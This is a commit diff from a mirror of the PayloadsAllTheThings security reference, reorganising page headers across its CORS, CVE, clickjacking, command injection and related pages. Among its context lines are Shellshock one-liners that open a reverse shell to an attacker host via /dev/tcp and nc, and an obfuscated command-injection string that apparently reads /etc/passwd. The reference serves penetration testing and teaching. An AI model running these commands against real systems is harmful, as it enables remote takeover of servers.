ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 10:26:09 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Normalize page header for API, CSPT, CORS, CSRF

Browse Source
This commit is contained in:
Swissky 2024-11-09 23:01:39 +01:00
parent c82cd6408a
commit d80f73a829
10 changed files with 135 additions and 90 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
API Key Leaks/IIS-Machine-Keys.md
View File

@ -16,12 +16,6 @@
* [References](#references)
**Requirements**
* `__VIEWSTATE`
* `__VIEWSTATEGENERATOR`*
## Viewstate Format
ViewState in IIS is a technique used to retain the state of web controls between postbacks in ASP.NET applications. It stores data in a hidden field on the page, allowing the page to maintain user input and other state information.
@ -135,6 +129,12 @@ List of interesting machine keys to use:
First you need to decode the Viewstate to know if the MAC and the encryption are enabled.
**Requirements**
* `__VIEWSTATE`
* `__VIEWSTATEGENERATOR`
### MAC Is Not Enabled
```ps1

55
CORS Misconfiguration/README.md
View File

@ -2,13 +2,21 @@
> A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attackers site using the victims credentials.
## Summary
* [Tools](#tools)
* [Prerequisites](#prerequisites)
* [Requirements](#requirements)
* [Exploitation](#exploitation)
* [Origin Reflection](#origin-reflection)
* [Null Origin](#null-origin)
* [XSS on Trusted Origin](#xss-on-trusted-origin)
* [Wildcard Origin `*` without Credentials](#wildcard-origin--without-credentials)
* [Expanding the Origin](#expanding-the-origin)
* [Labs](#labs)
* [References](#references)
## Tools
* [s0md3v/Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3v/Corsy/)
@ -17,17 +25,19 @@
* [trufflesecurity/of-cors - Exploit CORS misconfigurations on the internal networks](https://github.com/trufflesecurity/of-cors)
* [omranisecurity/CorsOne - Fast CORS Misconfiguration Discovery Tool](https://github.com/omranisecurity/CorsOne)
## Prerequisites
## Requirements
* BURP HEADER> `Origin: https://evil.com`
* VICTIM HEADER> `Access-Control-Allow-Credential: true`
* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` OR `Access-Control-Allow-Origin: null`
## Exploitation
Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target `https://victim.example.com/endpoint`.
### Vulnerable Example: Origin Reflection
### Origin Reflection
#### Vulnerable Implementation
@ -87,7 +97,7 @@ or
</html>
```
### Vulnerable Example: Null Origin
### Null Origin
#### Vulnerable Implementation
@ -128,7 +138,7 @@ origin in the request:
</script>"></iframe>
```
### Vulnerable Example: XSS on Trusted Origin
### XSS on Trusted Origin
If the application does implement a strict whitelist of allowed origins, the
exploit codes from above do not work. But if you have an XSS on a trusted
@ -139,7 +149,7 @@ again.
https://trusted-origin.example.com/?xss=<script>CORS-ATTACK-PAYLOAD</script>
```
### Vulnerable Example: Wildcard Origin `*` without Credentials
### Wildcard Origin `*` without Credentials
If the server responds with a wildcard origin `*`, **the browser does never send
the cookies**. However, if the server does not require authentication, it's still
@ -178,7 +188,9 @@ function reqListener() {
};
```
### Vulnerable Example: Expanding the Origin / Regex Issues
### Expanding the Origin
Occasionally, certain expansions of the original origin are not filtered on the server side. This might be caused by using a badly implemented regular expressions to validate the origin header.
#### Vulnerable Implementation (Example 1)
@ -247,26 +259,25 @@ function reqListener() {
};
```
## Labs
* [CORS vulnerability with basic origin reflection](https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack)
* [CORS vulnerability with trusted null origin](https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack)
* [CORS vulnerability with trusted insecure protocols](https://portswigger.net/web-security/cors/lab-breaking-https-attack)
* [CORS vulnerability with internal network pivot attack](https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack)
* [PortSwigger - CORS vulnerability with basic origin reflection](https://portswigger.net/web-security/cors/lab-basic-origin-reflection-attack)
* [PortSwigger - CORS vulnerability with trusted null origin](https://portswigger.net/web-security/cors/lab-null-origin-whitelisted-attack)
* [PortSwigger - CORS vulnerability with trusted insecure protocols](https://portswigger.net/web-security/cors/lab-breaking-https-attack)
* [PortSwigger - CORS vulnerability with internal network pivot attack](https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack)
## Bug Bounty reports
* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)
* [CORS misconfig | Account Takeover - niche.co - Rohan (nahoragg)](https://hackerone.com/reports/426147)
* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy)](https://hackerone.com/reports/235200)
* [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t)](https://hackerone.com/reports/430249)
* [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7)](https://hackerone.com/reports/470298)
## References
- [Think Outside the Scope: Advanced CORS Exploitation Techniques - Ayoub Safa (Sandh0t) - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
- [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7) - December 20, 2018](https://hackerone.com/reports/470298)
- [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://web.archive.org/web/20190516052453/https://www.corben.io/advanced-cors-techniques/)
- [CORS misconfig | Account Takeover - Rohan (nahoragg) - October 20, 2018](https://hackerone.com/reports/426147)
- [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t) - October 29, 2018](https://hackerone.com/reports/430249)
- [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax) - September 15, 2016](https://hackerone.com/reports/168574)
- [CORS Misconfigurations Explained - Detectify Blog - Apr 26, 2018](https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/)
- [Cross-origin resource sharing (CORS) - PortSwigger Web Security Academy - December 30, 2019](https://portswigger.net/web-security/cors)
- [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy) - June 1, 2017](https://hackerone.com/reports/235200)
- [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle - 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
- [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - December 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
- [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://web.archive.org/web/20190516052453/https://www.corben.io/advanced-cors-techniques/)
- [Cross-origin resource sharing (CORS) - PortSwigger Web Security Academy - December 30, 2019](https://portswigger.net/web-security/cors)
- [CORS Misconfigurations Explained - Detectify Blog - Apr 26, 2018](https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/)
- [Think Outside the Scope: Advanced CORS Exploitation Techniques - Ayoub Safa (Sandh0t) - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)

2
CRLF Injection/README.md
View File

@ -112,7 +112,7 @@ Remainder:
## Labs
* [Lab: HTTP/2 request splitting via CRLF injection - PortSwigger](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection)
* [PortSwigger - HTTP/2 request splitting via CRLF injection](https://portswigger.net/web-security/request-smuggling/advanced/lab-request-smuggling-h2-request-splitting-via-crlf-injection)
## References

27
CVE Exploits/README.md
View File

@ -1,5 +1,21 @@
# Common Vulnerabilities and Exposures
A CVE (Common Vulnerabilities and Exposures) is a unique identifier assigned to a publicly known cybersecurity vulnerability. CVEs help standardize the naming and tracking of vulnerabilities, making it easier for organizations, security professionals, and software vendors to share information and manage risks associated with these vulnerabilities. Each CVE entry includes a brief description of the vulnerability, its potential impact, and details about affected software or systems.
## Summary
* [Tools](#tools)
* [Big CVEs in the last 15 years](#big-cves-in-the-last-15-years)
* [CVE-2017-0144 - EternalBlue](#cve-2017-0144---eternalblue)
* [CVE-2017-5638 - Apache Struts 2](#cve-2017-5638---apache-struts-2)
* [CVE-2018-7600 - Drupalgeddon 2](#cve-2018-7600---drupalgeddon-2)
* [CVE-2019-0708 - BlueKeep](#cve-2019-0708---bluekeep)
* [CVE-2019-19781 - Citrix ADC Netscaler](#cve-2019-19781---citrix-adc-netscaler)
* [CVE-2014-0160 - Heartbleed](#cve-2014-0160---heartbleed)
* [CVE-2014-6271 - Shellshock](#cve-2014-6271---shellshock)
* [References](#references)
## Tools
- [Trickest CVE Repository - Automated collection of CVEs and PoC's](https://github.com/trickest/cve)
@ -8,7 +24,7 @@
- [CVE Details - The ultimate security vulnerability datasource](https://www.cvedetails.com)
## Big CVEs in the last 5 years.
## Big CVEs in the last 15 years
### CVE-2017-0144 - EternalBlue
@ -24,18 +40,22 @@ Afftected systems:
- Windows 10 Gold, 1511, and 1607
- Windows Server 2016
### CVE-2017-5638 - Apache Struts 2
On March 6th, a new remote code execution (RCE) vulnerability in Apache Struts 2 was made public. This recent vulnerability, CVE-2017-5638, allows a remote attacker to inject operating system commands into a web application through the “Content-Type” header.
### CVE-2018-7600 - Drupalgeddon 2
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised.
### CVE-2019-0708 - BlueKeep
A remote code execution vulnerability exists in Remote Desktop Services formerly known as Terminal Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
### CVE-2019-19781 - Citrix ADC Netscaler
A remote code execution vulnerability in Citrix Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway formerly known as NetScaler Gateway that, if exploited, could allow an unauthenticated attacker to perform arbitrary code execution.
@ -47,12 +67,12 @@ Affected products:
- Citrix ADC and NetScaler Gateway version 11.1 all supported builds
- Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds
## Older, but not forgotten
### CVE-2014-0160 - Heartbleed
The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
### CVE-2014-6271 - Shellshock
Shellshock, also known as Bashdoor is a family of security bug in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.
@ -62,7 +82,8 @@ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 10.0
curl --silent -k -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.0.0.2/4444 0>&1" "https://10.0.0.1/cgi-bin/admin.cgi"
```
## Thanks to
## References
* [Heartbleed - Official website](http://heartbleed.com)
* [Shellshock - Wikipedia](https://en.wikipedia.org/wiki/Shellshock_(software_bug))

13
Clickjacking/README.md
View File

@ -1,9 +1,6 @@
# Clickjacking
> Clickjacking is a type of web security vulnerability where a malicious website tricks a user into clicking on something different from what the user perceives,
> potentially causing the user to perform unintended actions without their knowledge or consent. Users are tricked into performing all sorts of unintended actions
> as such as typing in the password, clicking on Delete my account button, liking a post, deleting a post, commenting on a blog. In other words all the actions
> that a normal user can do on a legitimate website can be done using clickjacking.
> Clickjacking is a type of web security vulnerability where a malicious website tricks a user into clicking on something different from what the user perceives, potentially causing the user to perform unintended actions without their knowledge or consent. Users are tricked into performing all sorts of unintended actions as such as typing in the password, clicking on Delete my account button, liking a post, deleting a post, commenting on a blog. In other words all the actions that a normal user can do on a legitimate website can be done using clickjacking.
## Summary
@ -22,8 +19,8 @@
* [IE8 XSS filter](#ie8-xss-filter)
* [Chrome 4.0 XSSAuditor filter](#chrome-40-xssauditor-filter)
* [Challenge](#challenge)
* [Practice Environments](#practice-environments)
* [Reference](#references)
* [Labs](#labs)
* [References](#references)
## Tools
@ -229,10 +226,10 @@ Inspect the following code:
Determine the Clickjacking vulnerability within this code snippet. Identify how the hidden iframe is being used to exploit the user's actions when they click the button, leading them to a malicious website.
## Practice Environments
## Labs
* [OWASP WebGoat](https://owasp.org/www-project-webgoat/)
* [Client Side Clickjacking Test](https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/11-Client_Side_Testing/09-Testing_for_Clickjacking)
* [OWASP Client Side Clickjacking Test](https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/11-Client_Side_Testing/09-Testing_for_Clickjacking)
## References

21
Client Side Path Traversal/README.md
View File

@ -1,15 +1,18 @@
# Client Side Path Traversal
Client-Side Path Traversal (CSPT), sometimes also referred to as "On-site Request Forgery," is a vulnerability that can be exploited as a tool for CSRF or XSS attacks.
It takes advantage of the client side's ability to make requests using fetch to a URL, where multiple "../" characters can be injected. After normalization, these characters redirect the request to a different URL, potentially leading to security breaches.
Since every request is initiated from within the frontend of the application, the browser automatically includes cookies and other authentication mechanisms, making them available for exploitation in these attacks.
> Client-Side Path Traversal (CSPT), sometimes also referred to as "On-site Request Forgery," is a vulnerability that can be exploited as a tool for CSRF or XSS attacks.
> It takes advantage of the client side's ability to make requests using fetch to a URL, where multiple "../" characters can be injected. After normalization, these characters redirect the request to a different URL, potentially leading to security breaches.
> Since every request is initiated from within the frontend of the application, the browser automatically includes cookies and other authentication mechanisms, making them available for exploitation in these attacks.
## Summary
* [Tools](#tools)
* [Lab](#lab)
* [CSPT to XSS](#cspt-to-xss)
* [CSPT to CSRF](#cspt-to-xss)
* [Labs](#labs)
* [References](#references)
@ -18,11 +21,6 @@ Since every request is initiated from within the frontend of the application, th
* [doyensec/CSPTBurpExtension](https://github.com/doyensec/CSPTBurpExtension) - CSPT is an open-source Burp Suite extension to find and exploit Client-Side Path Traversal.
## Lab
* [doyensec/CSPTPlayground](https://github.com/doyensec/CSPTPlayground) - CSPTPlayground is an open-source playground to find and exploit Client-Side Path Traversal (CSPT).
## CSPT to XSS
![](https://matanber.com/images/blog/cspt-query-param.png)
@ -61,6 +59,11 @@ Real-World Scenarios:
* [CVE-2023-5123 : CSPT2CSRF in Grafanas JSON API Plugin](https://medium.com/@maxime.escourbiac/grafana-cve-2023-5123-write-up-74e1be7ef652)
## Labs
* [doyensec/CSPTPlayground](https://github.com/doyensec/CSPTPlayground) - CSPTPlayground is an open-source playground to find and exploit Client-Side Path Traversal (CSPT).
## References
- [Exploiting Client-Side Path Traversal to Perform Cross-Site Request Forgery - Introducing CSPT2CSRF - Maxence Schmitt - 02 Jul 2024](https://blog.doyensec.com/2024/07/02/cspt2csrf.html)

17
Command Injection/README.md
View File

@ -2,6 +2,7 @@
> Command injection is a security vulnerability that allows an attacker to execute arbitrary commands inside a vulnerable application.
## Summary
* [Tools](#tools)
@ -35,7 +36,7 @@
* [Backgrounding long running commands](#backgrounding-long-running-commands)
* [Remove arguments after the injection](#remove-arguments-after-the-injection)
* [Labs](#labs)
* [Challenge](#challenge)
* [Challenge](#challenge)
* [References](#references)
@ -417,14 +418,14 @@ In Unix-like command-line interfaces, the `--` symbol is used to signify the end
## Labs
* [OS command injection, simple case](https://portswigger.net/web-security/os-command-injection/lab-simple)
* [Blind OS command injection with time delays](https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays)
* [Blind OS command injection with output redirection](https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection)
* [Blind OS command injection with out-of-band interaction](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band)
* [Blind OS command injection with out-of-band data exfiltration](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration)
* [PortSwigger - OS command injection, simple case](https://portswigger.net/web-security/os-command-injection/lab-simple)
* [PortSwigger - Blind OS command injection with time delays](https://portswigger.net/web-security/os-command-injection/lab-blind-time-delays)
* [PortSwigger - Blind OS command injection with output redirection](https://portswigger.net/web-security/os-command-injection/lab-blind-output-redirection)
* [PortSwigger - Blind OS command injection with out-of-band interaction](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band)
* [PortSwigger - Blind OS command injection with out-of-band data exfiltration](https://portswigger.net/web-security/os-command-injection/lab-blind-out-of-band-data-exfiltration)
## Challenge
### Challenge
Challenge based on the previous tricks, what does the following command do:
@ -432,6 +433,8 @@ Challenge based on the previous tricks, what does the following command do:
g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
```
**NOTE**: The command is safe to run, but you should not trust me.
## References

2
SQL Injection/README.md
View File

@ -20,7 +20,7 @@ Attempting to manipulate SQL queries may have goals including:
* [Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Cassandra%20Injection.md)
* [HQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/HQL%20Injection.md)
* [DB2 Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/DB2%20Injection.md)
* [SQLmap Cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLmap%20Cheatsheet.md)
* [SQLmap](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLmap%20Cheatsheet.md)
* [Entry point detection](#entry-point-detection)
* [DBMS Identification](#dbms-identification)
* [Authentication bypass](#authentication-bypass)

1
_LEARNING_AND_SOCIALS/YOUTUBE.md
View File

@ -27,6 +27,7 @@
- [EP004: Bug Hunters | HACKING GOOGLE](https://youtu.be/IoXiXlCNoXg)
- [EP005: Project Zero | HACKING GOOGLE](https://youtu.be/My_13FXODdU)
## Conferences
- [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)

21
_template_vuln/README.md
View File

@ -5,18 +5,20 @@
## Summary
* [Tools](#tools)
* [Something](#something)
* [Methodology](#methodology)
* [Subentry 1](#subentry-1)
* [Subentry 2](#subentry-2)
* [Labs](#labs)
* [References](#references)
## Tools
- [Tool 1](https://example.com)
- [Tool 2](https://example.com)
- [username/tool1](https://github.com/username/tool1) - Description of the tool
- [username/tool2](https://github.com/username/tool2) - Description of the tool
## Something
## Methodology
Quick explanation
@ -24,13 +26,20 @@ Quick explanation
Exploit
```
### Subentry 1
### Subentry 2
## Labs
- [Company - Lab 1](#link-to-the-lab)
- [Company - Lab 2](#link-to-the-lab)
- [Company - Challenge 1](#link-to-the-challenge)
- [Company - Challenge 2](#link-to-the-challenge)
## References
- [Blog title - Author, Date](https://example.com)
- [Blog title - Author (@handle) - Month XX, 202X](https://example.com)